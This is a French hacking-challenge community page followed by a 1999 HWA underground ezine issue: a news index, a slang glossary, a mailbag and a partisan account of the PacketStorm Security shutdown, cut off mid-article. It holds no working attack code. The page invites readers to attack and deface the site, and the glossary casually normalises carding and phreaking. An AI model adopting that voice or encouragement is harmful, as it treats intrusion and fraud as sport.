Plateforme de Hacking est une communauté faisant évoluer un système de services vulnérables.

Nous apprenons à exploiter de manière collaborative des solutions permettant de détourner les systèmes d'informations.
Cet apprentissage nous permet d'améliorer les technologies que nous utilisons et/ou de mieux comprendre l'ingénierie social.

Nous défendons les valeurs de l'entraide, du challenge personnel et contribuons modestement à rendre l'expérience des utilisateurs finaux la plus agréable possible.

Vous pouvez nous rencontrer via notre salon irc.
Le forum est en cours de remplacement par une version plus moderne, et tout aussi faillible que l'ancien ^^.
A ce jours nous enregistrons plusieurs dizaines de hack réussi contre notre site, et ce chiffre est en constante évolution. Merci a tous les contributeurs!

La refonte est en version alpha. Cette nouvelle plateforme permet de pentester à distance sans avoir son matériel à disposition.
Via l'exécution de scripts python connecté en websocket à l'ihm web, nous pouvons piloter le chargement de scénario
d'attaque/défense en "multijoueur" ^^.
Le système permet de charger des scripts de bibliothèques partagées et de chiffrer les échanges selon les modules déployés.
Vous trouverez dans la rubrique article de nombreux tutoriels afin de mieux comprendre la sécurité informatique,
ainsi que différents articles plus poussés.
  • Sniffing
  • Cracking
  • Buffer overflow
  • Créations d'exploits
  • Social engineering
  • L'anonymat sur le web, spoofing
  • Bypass-proxy, Bypass-firewall
  • Injection de code SSI, SQL, etc...
  • Utilisation d'exploits, création de scripts(php, irc, perl)
Nous vous recommandons de sniffer votre réseau lors de votre navigation sur le site. La refonte vous fournira un outillage pour réaliser vos attaques/défenses.
Flux RSS

flux RSS d'HackBBS Abonnez-vous. Soyez prévenu des tournois, challenges, actualités, ...
Recevez nos dernières actualités sur notre flux RSS.

Vous pourrez également participer à de nombreux challenges en constant renouvellement (si possible :p)
Dernièrement, les missions relativent aux derniers produits open sources marchent bien :)

Votre ultime challenge sera de défacer HackBBS. De nombreuses failles sont présentes. A vous de les trouver et de les exploiter.

Cet ultime test permettra de constater votre réactions face à une faille.
Black ou White? ^^

Ezine du moment: HWA-hn23.txt
    [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  =                       <=-[ ]-=>                         =
    [=HWA'99=]                         Number 23 Volume 1 1999 July 4th  99
    [                     61:20:6B:69:64:20:63:6F:75:                    ]
    [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
    [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        

   "I have received more death threats in the last 24 hours by phone, than I
    have in five years," - John Vranesevich aka JP (AntiOnline)                  
                 is sponsored by Cubesoft communications
     and thanks to p0lix for the digitalgeeks bandwidth
     and airportman for the Cubesoft bandwidth. Also shouts out to all our
     mirror sites! tnx guys. 

  Mirror Sites:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~     * DOWN *

   The purpose of this newsletter is to 'digest' current events of interest
   that affect the online underground and netizens in general. This includes
   coverage of general security issues, hacks, exploits, underground news
   and anything else I think is worthy of a look see. (remember i'm doing
   this for me, not you, the fact some people happen to get a kick/use
   out of it is of secondary importance).

    This list is NOT meant as a replacement for, nor to compete with, the
   likes of publications such as CuD or PHRACK or with news sites such as
   AntiOnline, the Hacker News Network (HNN) or mailing lists such as
   BUGTRAQ or ISN nor could any other 'digest' of this type do so.

    It *is* intended  however, to  compliment such material and provide a
   reference to those who follow the culture by keeping tabs on as many
   sources as possible and providing links to further info, its a labour
   of love and will be continued for as long as I feel like it, i'm not
   motivated by dollars or the illusion of fame, did you ever notice how
   the most famous/infamous hackers are the ones that get caught? there's
   a lot to be said for remaining just outside the circle... 



                     Welcome to ... #23


    We could use some more people joining the channel, its usually pretty
    quiet, we don't bite (usually) so if you're hanging out on irc stop
    by and idle a while and say hi...   

    ***      /join on EFnet the key is `zwen'       ***
    ***                                                             ***
    *** please join to discuss or impart news on techno/phac scene  ***
    *** stuff or just to hang out ... someone is usually around 24/7***
    ***                                                             ***
    *** Note that the channel isn't there to entertain you its for  ***
    *** you to talk to us and impart news, if you're looking for fun***
    *** then do NOT join our channel try #weirdwigs or something... ***
    *** we're not #chatzone or #hack                                ***
    ***                                                             ***

  Issue #23

  [ INDEX ]
    Key     Intros                                                         
    00.0  .. COPYRIGHTS ......................................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. SOURCES .........................................................
    00.3  .. THIS IS WHO WE ARE ..............................................
    00.4  .. WHAT'S IN A NAME? why `'?..........................
    00.5  .. THE HWA_FAQ V1.0 ................................................

    Key     Content 

    01.0  .. GREETS ..........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ...........................
     01.2 .. Mailbag .........................................................
    02.0  .. From the Editor.................................................. 
    AA.A  .. SPECIAL: AntiOnline's JP pulls the plug on PacketStorm Security
    03.0  .. Cable Modem Hijacking from
    04.0  .. Exploiting Null Session Weaknesses in NT environment.............
    05.0  .. Cognos PowerPlay Web Edition security vunerability allows access to data cubes..
    06.0  .. VMware Security Alert............................................
    07.0  .. Security vulnerability in login template ............
    08.0  .. DOD investigating computer 'Mob-like' tactics....................
    09.0  .. GSA announces Intrusion Detection Net............................
    10.0  .. Nasa servers reportedly hacked...................................
    11.0  .. UK May Force ISPs to Install Taps................................
    12.0  .. Crypto Tie Downs Loosened .......................................
    13.0  .. Heathen.A Spreads Through Word Files  ...........................
    14.0  .. $950 for a Log File Analysis Tool ...............................
    15.0  .. Youth Charged With $20,000 in Damages ...........................
    16.0  .. Army Fights Online Battle And Looses ............................
    17.0  .. Welfare Reform Law Invades Privacy of US Citizens  ..............
    18.0  .. GSM Mobile Security is Cracked ..................................
    19.0  .. Microsoft Mono-culture Poses National Security Risk .............
    20.0  .. BugTraq Moves To SecurityFocus ..................................
    21.0  .. MS Gives Out Pirate Dough .......................................
    22.0  .. Biometrics comes to Home Shopping ...............................
    23.0  .. Palm VII Revealed ...............................................
    24.0  .. Who Is HNN? .....................................................
    25.0  .. AntiOnline on the trail of f0rpaxe...............................
    26.0  .. Critical NOAA Web Site Attacked .................................
    27.0  .. Back Orifice 2000 is on its Way .................................
    28.0  .. Support for Web Security Spec Announced .........................
    29.0  .. Pentagon Investigates Computer Security Breech ..................
    30.0  .. What will the Next Generation of Viruses Bring? .................
    31.0  .. DIRT still Around, Used by LAw Enforcement ......................
    32.0  .. Debit Cards Not Safe on the Internet ............................
    33.0  .. New Definition of 'Computer Hacker' .............................
    34.0  .. Hackers In the Workplace ........................................
    35.0  .. NPR Covers .gov/.mil Defacements. ............................... 
    36.0  .. Australia Passes Major Net Censorship Law .......................
    37.0  .. Hacker crackdown, is your nick on this list?? ...................
    RUMOURS .Rumours from around and about, mainly HNN stuff (not hacked websites)
    AD.S  .. Post your site ads or etc here, if you can offer something in return
             thats tres cool, if not we'll consider ur ad anyways so send it in.
             ads for other zines are ok too btw just mention us in yours, please
             remember to include links and an email contact. Corporate ads will
             be considered also and if your company wishes to donate to or 
             participate in the upcoming Canc0n99 event send in your suggestions
             and ads now...n.b date and time may be pushed back join mailing list
             for up to date information.......................................
             Current dates: Aug19th-22nd Niagara Falls...    .................

    HA.HA  .. Humour and puzzles  ............................................
              Hey You!........................................................
              Send in humour for this section! I need a laugh and its hard to
              find good stuff... ;)...........................................

    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
     A.1   .. PHACVW linx and references......................................


          Important semi-legalese and license to redistribute:
          APPRECIATED the current link is
          ME PRIVATELY current email
          Although this file and all future issues are now copyright, some of
         the content holds its  own copyright and these are printed and
         respected. News is news so i'll print any and all news but will quote
         sources when the source is known, if its good enough for CNN its good
         enough for me. And i'm doing it for free on my own time so pfffft. :)
         No monies are made or sought through the distribution of this material.
         If you have a problem or concern email me and we'll discuss it.
         Cruciphux [C*:.]


     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
    Canada / North America (hell even if you are inside ..) and wish to
    send printed matter like newspaper clippings a subscription to your
    cool foreign hacking zine or photos, small non-explosive packages
    or sensitive information etc etc well, now you can. (w00t) please
    no more inflatable sheep or plastic dog droppings, or fake vomit

    Send all goodies to:

	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    L6V 4H5

    WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
    ~~~~~~~  reading this from some interesting places, make my day and get a
             mention in the zine, send in a postcard, I realize that some places
             it is cost prohibitive but if you have the time and money be a cool
             dude / gal and send a poor guy a postcard preferably one that has some
             scenery from your place of residence for my collection, I collect stamps
             too so you kill two birds with one stone by being cool and mailing in a
             postcard, return address not necessary, just a  "hey guys being cool in
             Bahrain, take it easy" will do ... ;-) thanx.

    Ideas for interesting 'stuff' to send in apart from news:

    - Photo copies of old system manual front pages (optionally signed by you) ;-)
    - Photos of yourself, your mom, sister, dog and or cat in a NON
      compromising position plz I don't want pr0n. 
    - Picture postcards
    - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
      tapes with hack/security related archives, logs, irc logs etc on em.
    - audio or video cassettes of yourself/others etc of interesting phone
      fun or social engineering examples or transcripts thereof.

    If you still can't think of anything you're probably not that interesting
    a person after all so don't worry about it 

    Our current email:

    Submissions/zine gossip.....:
    Private email to editor.....:


 00.2 Sources ***

     Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance) Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information is compiled
    and or sourced by Cruciphux no copyright claimed.

    News & I/O zine .................
    Back Orifice/cDc..................
    News site (HNN) .....,............
    Help Net Security.................
    News,Advisories,++ ...............
    NewsTrolls .......................
    News + Exploit archive ...........
    CuD Computer Underground Digest...
    News site+........................
    News site+Security................
    News site+Security................
    News site+Security................
    News site+Security related site...
    News/Humour site+ ................

    +Various mailing lists and some newsgroups, such as ...
    +other sites available on the HNN affiliates page, please see as they seem to be popping up
     rather frequently ...
 .. IRC list/admin archives  .. Jesse Berst's AnchorDesk

    ISN security mailing list

    NEWS Agencies, News search engines etc:
    Link (Kevin Poulsen's Column)
    NOTE: See appendices for details on other links.
    Link Electronic Underground Affiliation
    Link ech0 Security
    Link Hackers Information Report
    Link Net Security
    Link   Daily news and security related site


    All submissions that are `published' are printed with the credits
    you provide, if no response is received by a week or two it is assumed
    that you don't care wether the article/email is to be used in an issue
    or not and may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.

    - Ed

    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq :


    BUGTRAQ - Subscription info

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin . To subscribe to
    bugtraq, send mail to containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;


    About the Bugtraq mailing list

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list`s charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
    reflector address if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
    those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.

    For questions or comments, please mail me: (Scott Chasin)


       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit or send a
      blank message to To unsubscribe,
      visit Back issues are available

       CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW. He
      is a frequent writer and lecturer on cryptography.

    CUD Computer Underground Digest
    This info directly from their latest ish:

    Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09

 ISSN 1004-042X

 Editor: Jim Thomas (
 News Editor: Gordon Meyer (
 Archivist: Brendan Kehoe
 Poof Reader: Etaion Shrdlu, Jr.
 Shadow-Archivists: Dan Carosone / Paul Southworth
 Ralph Sims / Jyrki Kuoppala
 Ian Dickinson
 Cu Digest Homepage:

    [ISN] Security list
    This is a low volume list with lots of informative articles, if I had my
    way i'd reproduce them ALL here, well almost all .... ;-) - Ed

    Subscribe: mail with "subscribe isn".


      Some HWA members and Legacy staff
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ currently active/editorial currently active/man in black currently active/IRC+ man in black ............. currently active/IRC+ distribution ........: currently active/IRC+ proof reader/grrl in black
      dicentra...(email withheld): IRC+ grrl in black

      Foreign Correspondants/affiliate members
       N0Portz ..........................: Australia
       Qubik ............................: United Kingdom
       system error .....................: Indonesia
       Wile (wile coyote) ...............: Japan/the East
       Ruffneck  ........................: Netherlands/Holland

       And unofficially yet contributing too much to ignore ;)

       Spikeman .........................: World media

       Please send in your sites for inclusion here if you haven't already
       also if you want your emails listed send me a note ... - Ed

      Spikeman's site is down as of this writing, if it comes back online it will be
      posted here.  ............ System Error's site (in Indonesian) 

       ***      /join on EFnet the key is `zwen'       ***


    1. We do NOT work for the government in any shape or form.Unless you count paying
       taxes ... in which case we work for the gov't in a BIG WAY. :-/

    2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
       events its a good idea to check out issue #1 at least and possibly also the
       Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


 00.4 Whats in a name? why
      Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pidgeon holed with those 'dumb
     leet (l33t?) dewds'  this is the state
     of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
     up  and comers, i'd highly recommend you get that book. Its almost
     like  buying a clue. Anyway..on with the show .. - Editorial staff


00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time

    Some of the stuff related to personal useage and use in this zine are
    listed below: Some are very useful, others attempt to deny the any possible
    attempts at eschewing obfuscation by obsucuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavey equals" sign means "almost equal" to. If written
             an =/= (equals sign with a slash thru it) also means !=, =< is Equal
             to or less than and =>  is equal to or greater than (etc, this aint
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??

   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's

    CCC    - Chaos Computer Club (Germany)

   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.
   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed

    Ebonics - speaking like a rastafarian or hip dude of colour  also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN  - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin'way

   *0WN3D - You are cracked and owned by an elite entity see pheer
   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same 
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking 
                      C - Cracking 
                      V - Virus
                      W - Warfare 
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit.

   *w00t  - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
            from the underground masses. also "w00ten" 

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
                            -=-    :.    .:        -=-

 01.0 Greets!?!?! yeah greets! w0w huh. - Ed

     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, whats good, what sucks
     etc, not that I guarantee i'll take any notice mind you, but send in
     your thoughts anyway.

       * all the people who sent in cool emails and support
     FProphet       Pyra                TwstdPair      _NeM_
     D----Y         Kevin Mitnick (watch yer back)     Dicentra
     vexxation      sAs72               Spikeman       Astral
     p0lix          Vexx                g0at security  
     pr0xy          Astral              
     Ken Williams/tattooman of PacketStorm, hang in there Ken...:(
     and the #innerpulse, crew (innerpulse is back!) and some inhabitants 
     of #leetchans ....  although I use the term 'leet loosely these days,
     kewl sites:

     + NEW
     +    ******* DOWN ********* SEE AA.A
     + (Went online same time we started issue 1!)


 01.1 Last minute stuff, rumours and newsbytes

       "What is popular isn't always right, and what is right isn't
         always popular..."
                           - FProphet '99

    +++ When was the last time you backed up your important data?
     ++ Help Net Security is Moving. 

        contributed by BHZ 
        Help-net Security, an HNN Affiliate is moving to a new server. Unfortunately they have encountered a few
        problems with transferring the domain. So could be unfunctional for up to 5 days.
        In the mean time you can reach HNS at 
        Help-net Security - Old URL
        Help-net Security - New URL
     ++ TECHNO BRA CALLS THE COPS (TECH. 3:00 am Jul 1st)

        A security bra monitors the wearer's heart rate to sense
        danger. When activated, it relays her location to the cops
        and helps them make a bust. By Leander Kahney.
     ++ ALLEN BUYS ANOTHER CABLE SHOP (BUS. 9:00 am Jul 1st)

        Paul Allen takes another step towards becoming master of his
        own "wired world" with the US$3.1 billion acquisition of
        Bresnan Communications, a Midwest cable operator.

     ++ WAITING FOR WAP (TECH. 3:00 am Jul 1st)

        Supporters say the Wireless Access Protocol promises to bring
        Web services to tiny cell-phone screens. But when? Chris
        Oakes reports from San Francisco.


        The free Web server that has always had the lion's share of
        the market now has a corporation behind it. The nonprofit
        company is being run by Apache's founding fathers.     
     ++ SORRY, WRONG NUMBER (WRLD Wednesday)

        Manhattanites take pride in their 212 area code, a
        distinctive symbol of living in The Most Important Place on
        Earth. But starting Thursday, some of them are going to have
        to adjust to life without 212, when Bell Atlantic begins
        issuing 646 area codes to new phone subscribers in
        Manhattan. The move, necessitated by too many phone numbers,
        is not going down too well, although former New York Mayor
        Ed Koch expects the grousing to stop after an adjustment
        period. Besides, residents of Gotham will still hold on to
        all the other perks that make living there such a joy:
        astronomical rents, overpriced restaurants, and living
        cheek-by-jowl with one another.
     ++ ZEROING IN ON CELL-PHONE 911S (TECH. Wednesday)

        New technology will pinpoint a mobile-phone user's location
        to within 5 feet -- a potential lifesaver in 911 calls. But
        watchdogs say the data will inevitably be within the reach
        of snoops. By Chris Oakes.
      Mucho thanks to Spikeman for directing his efforts to our cause of bringing
      you the news we want to read about in a timely manner ... - Ed


 01.2 MAILBAG - email and posts from the message board worthy of a read
       From: "Whimsies & Company"  
       Subject: Please support Justice and Free Speech 
       Date: Thu, 1 Jul 1999 19:18:02 -0400 
       MIME-Version: 1.0 
       Content-Type: text/plain; 
       Content-Transfer-Encoding: 7bit 
       X-Priority: 3 
       X-MSMail-Priority: Normal 
       X-Mailer: Microsoft Outlook Express 4.72.3110.5 
       X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 
       Dark Modem DOWN For Emergency ACTION
       OK, two issues: 1) the following message has been sent to a TARGETED
       audience. We have walked a thin line between targeted mailing and spam. If
       we get even one complaint, we will stop. 2) It cannot be confirmed that any
       unusual activity has occurred on the antionline network in the past 24 hours
       *grin* therefore we have taken that statement out of the message.
       Again, we do NOT advocate spamming, we only want people who might be
       interested in this issue to be aware, so use DISCRETION when sending any
       This is an emergency email message from Dark Modem
       ( Yesterday (June 30, 1999), Packet Storm Security
       was taken offline after John Vranesevich sent an email to Harvard University
       about the JP section that was on the site. Some suspect it was really
       jealousy and animosity toward Ken Williams that drove JP to commit this
       offensive act. Packet Storm was in direct competition with antionline and
       essentially blew antionline out of the water in every category. It is this
       author's belief, therefore, that JP was trying to protect his "marketshare"
       (something that Ken Williams would never have done, since he was not in it
       for money).
       Please show your support by mentioning this topic on your website,
       forwarding this email to "whom it may concern", and sending email in support
       of Ken and PSS to Harvard and antionline.

 02.0 From the editor.


      printf ("Read commented source!\n\n");

      *Otay buttwheat, here's #23 it might not be as bulging in the
      *pantal area as #22 but it should be a little cleaner (or not)
      *we've had some people coming into the IRC channel on EFNET and
      *just parting, maybe you're just scanning the nicks, but hey we
      *don't bite come and hang out, maybe chat about some of the shit
      *thats going down with Packetstorm or why 2600 is $7.15 in Canada
      *does Eric hate Canadians or whats the story? 
      *... who the fuck does JP think he is? fucking with PSS
      *there goes a ton of Ken's work down the drain...fuck AntiOnline!
      *(Read section AA.A)
      *anyway enjoy this issue and shouts out to HackCanada..and Ken
      *Williams ..
      printf ("EoF.\n");

      Issue #23, rocking your sysadmin and hax0r asses in 99...

      Congrats, thanks, articles, news submissions and kudos to us at the
     main address: complaints and all nastygrams and
     mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to, private mail to



 AA.A AntiOnline's JP causes the plug to be pulled on PacketStorm by Harvard
       June 30th AM a Call from John Vranesevich (aka JP) of AntiOnline to
       Harvard started off an avalanche of events that culminated in the 
       plug being pulled at Along with personal data
       it was initially reported that the entire site was lost, this may now
       not be the case. Included here are statements from JP, Harvard, Ken 
       Williams and stories from, HNN (
       and other sources.... read the sordid story below - Ed
       (At this time it is uncertain wether Ken does or does not have backups of
        his PacketStorm site available to him but some people on the net have 
        taken it upon themselves to begin a new mirror and are calling for people
        that have downloaded from the site to re-upload the files to the following
        url;    - Ed )
       From: Ken Williams 
       To: The Usual Suspects:  ;
       Date: Thu, 1 Jul 1999 02:17:40 -0400 (EDT)
       I just got off the phone (6/30/99 PM) with one of the Harvard 
       Network managers.  John Vranesevich, of, 
       contacted Harvard this morning and threatened to sue them 
       because of the content in the jp/ directory of the Packet 
       Storm Security web site that was located at, and before that at (see 
       for details about this info).  I was told that the situation 
       quickly escalated to the Harvard Office of General Counsel.  
       John Vranesevich claims that I was using the server as a 
       platform to harass and threaten him, his family, and his 
       business.  Nothing could be further from the truth.  I ran
       a network security related web site and archive!
       The result:  the server and the web site and it's contents
       are permanently offline, I have no access to even retrieve
       anything off of the server, the site known as "Packet Storm 
       Security" is history now.  I was told by Leo Donnelly at 
       Harvard, via phone, that ALL of the content AND the backups 
       made are either destroyed, being destroyed now, or will be 
       before I can do anything to prevent it.  All 4+ GB of files
       in the publicly accessible directories, over 45,000 files 
       collected and archived over the years, are gone.  There was 
       another 4 GB that was composed of research data, customized
       IDS, Linux, Apache software, etc too.
       Harvard is facing a lawsuit from JP, I am facing a lawsuit
       from JP, and possibly some sort of legal action from Harvard.
       Harvard seems to be trying to free themselves of any liability, 
       and use me as the fall guy for this whole thing.  All 
       agreements with Harvard in the beginning were verbal (with 
       Jeff Gray, the senior sysadmin), so I've got nothing on paper 
       to back up the truth.  I've got emails, but I don't have the
       money or legal defense to counter Harvard, or anybody else for 
       that matter.
       This has turned really ugly, really quickly, and it is very 
       plausible that I will be facing charges involving "hacking" 
       or computer crimes of some sort, because I "never had a 
       Harvard ID, and thus was not authorized to use their
       facilities", and I "compromised their security."  I guess it
       doesn't matter that I was contacted by the Senior Sysadmin at
       Harvard and invited to move my site there.  It doesn't matter 
       that the head of Harvard UIS approved of everything.  It 
       doesn't matter that he placed the box on a subnet of his 
       choosing and called me and gave me the root password and told 
       me I had free rein on the box.  It doesn't matter that 
       Harvard network security was never actually compromised.  
       For the record, Jeff Gray, the Harvard senior sysadmin, has 
       been extremely supportive of my site and work from the 
       beginning, and he deserves ALOT of credit for going out of 
       his way to help keep Packet Storm Security alive and online.  
       In fact, Jeff Gray has provided so much support for "the 
       security community" in general, and is so supportive of 
       security-related research and projects, that he deserves all 
       the credit in the world for his efforts.  I hope Harvard
       gives him the credit he is due, because any network security
       they have is in large part due to his skills, devotion, and 
       If that's not enough to annoy me, all of my class work for 
       the class I'm taking at NCSU this summer (CSC499 Independent 
       Research project involving IDS) is/was on that server at 
       Harvard and gone now too.  With 4 weeks left in the semester 
       here at NCSU, I have just lost seven weeks of work and data 
       that cannot be replaced in 4 weeks.  
       What bothers me the most is that all of the countless hours I
       put into that web site and the archives, thousands of hours,
       are gone now, for good.
       The site was getting over 400,000 hits/day and doing about
       10 GB/day in transfers, so I don't see it coming back online
       even if I do get any of the site content back.
       Obviously, I have taken full responsibility for the site
       content and all activities and events associated with that 
       server.  Even though no laws or rules were broken, on my part,
       and to my knowledge, I am now facing possible legal action 
       from both JP and Harvard, and state/federal computer crime 
       charges as well.  
       What am I going to do now?  I don't know.  The web site I
       devoted most of my waking hours to is gone.  My chances of
       passing my CSC499 class do not look good, according to the 
       negative comments from my professor.  I'll try to salvage
       the summer's worth of course work anyway if possible and pass.  
       Until formal charges are filed, I've still got my job and 
       account here at NCSU.  When NCSU catches wind of this, and 
       I'm sure they will, my account probably will be permanently 
       revoked, and my job and the past three years of school will 
       then be gone too.  Until then, I can be contacted at the email 
       address in the sig below.
       Check out the news and history of John Vranesevich and 
       Carolyn Meinel's smear and harassment campaigns that have ruined 
       the careers and lives of many people, mine included. has all of the details.
       Funny how I spent the past few years donating my time, literally
       thousands and thousands of hours, to "the security community", 
       never asking for or making a single penny off the time and work 
       I invested, and have now lost it all because John Vranesevich 
       and a few of his IRC friends are able to make quick phone calls, 
       fabricate absurd stories about criminal activity, libel, threaten 
       to sue Harvard, and I don't even get to plead my case.  I am 
       guilty without even being informed of what was going on.
       He has effectively ruined years of my work, my education, my 
       career, my life.  
       There are really only four things that I'd like right now:
       1. Justice
       2. Truth
       3. The 3 GB of MY data that Harvard has and refuses to turn 
          over to me
       4. A job in the IT/IS/IW industries - the pay doesn't even matter,
          I'm willing to move, I'm willing to put in 60-80 hour weeks.
          Just give me a UNIX or Linux box to work from.
       I'll settle for just the job though, and like I said, the pay 
       doesn't matter - I love computers, network security, and systems 
       administration.  If I was not doing it for pay, I'd be doing it 
       for free.
       See you at BlackHat and DEFCON.
       take it easy,
       Ken Williams
       if you need to reach me by phone, email me at
       and CC the email to with phone # request.
       my pgp keys are available on all of the regular keyservers, and at
       [Note: yes, you can quote or print any part of or the whole email.]
       Ken Williams
       Packet Storm Security               
       -----BEGIN PGP SIGNATURE-----
       Version: PGPfreeware 5.0i for non-commercial use
       Charset: noconv
       -----END PGP SIGNATURE-----

       Net Thug Shuts Down Largest Free Security Site
       Wed Jun 30 16:36:10 MDT 1999
       ATTRITION Staff
       Earlier today, the PacketStorm Security site was abruptly shut down
       with no warning. PacketStorm (
       was one of the largest and most respected sites catering to security
       professionals worldwide. Boasting an average of 400,000 hits a day,
       pushing out roughly 10 gigs of traffic, the site was a valuable resource 
       to an estimated 10,000 security professionals world wide.
       The security resource did not suffer at the hands of hackers or 
       network intruders. Instead, a new kind of malicious criminal found 
       success through a fear that haunts more and more Americans today.
